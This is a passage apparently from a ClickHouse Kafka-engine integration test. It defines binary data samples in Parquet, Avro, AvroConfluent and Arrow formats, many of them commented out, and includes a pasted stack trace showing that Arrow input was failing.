b2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
# 'Avro' : {
# 'data_sample' : [
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0',
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a\x1e\xac\x02\x02\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x04\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x06\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x08\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x10\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x12\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x14\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x16\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x18\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a',
# '\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f',
# ],
# },
'AvroConfluent' : {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client, {'id':0L,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}),
''.join(map(lambda id: avro_confluent_message(cluster.schema_registry_client, {'id':id,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}), range(1,16))),
avro_confluent_message(cluster.schema_registry_client, {'id':0L,'blockNo':0,'val1':unicode('AM'),'val2':0.5,"val3":1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
}
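# Note on the 'AvroConfluent' samples above: avro_confluent_message() (a helper
# assumed to be defined elsewhere in this file) is expected to produce messages in
# the Confluent schema-registry wire format - a 0x00 magic byte, a 4-byte
# big-endian schema id, then the Avro-binary-encoded record - which is why the
# schema registry URL has to be passed to the Kafka engine via 'extra_settings'.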
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00
\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00